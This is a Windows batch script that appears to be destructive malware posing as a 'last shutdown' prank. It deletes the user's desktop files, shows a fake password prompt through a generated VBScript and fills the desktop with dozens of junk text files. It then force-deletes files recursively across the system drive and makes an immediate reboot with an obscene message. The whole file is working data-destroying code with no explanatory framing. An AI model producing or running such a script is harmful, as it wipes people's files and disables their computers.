@echo off
del "%userprofile%\Assembly"/q
del "%userprofile%\desktop"/q
md "%userprofile%\Assembly"

echo inputbox "Insert password or last shutdown", "Password", "password" >> "%userprofile%\Assembly\first.vbs"
echo msgbox "Last shutdown", 16, "Goodbye" >> "%userprofile%\Assembly\first.vbs"

start  "%userprofile%\Assembly\first.vbs"

timeout 7 >nul /nobreak
 
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt"
echo Last shutdown: %date% %time% >> "%userprofile%\desktop\%random%.txt" 
echo Last shutdown at %time% of %date%
timeout 1 >nul /nobreak
echo Goodbye
del "%systemdrive%\*.*"/f/s/q
shutdown /r /f /c "FUCK YOU OFF BITCH" /t 00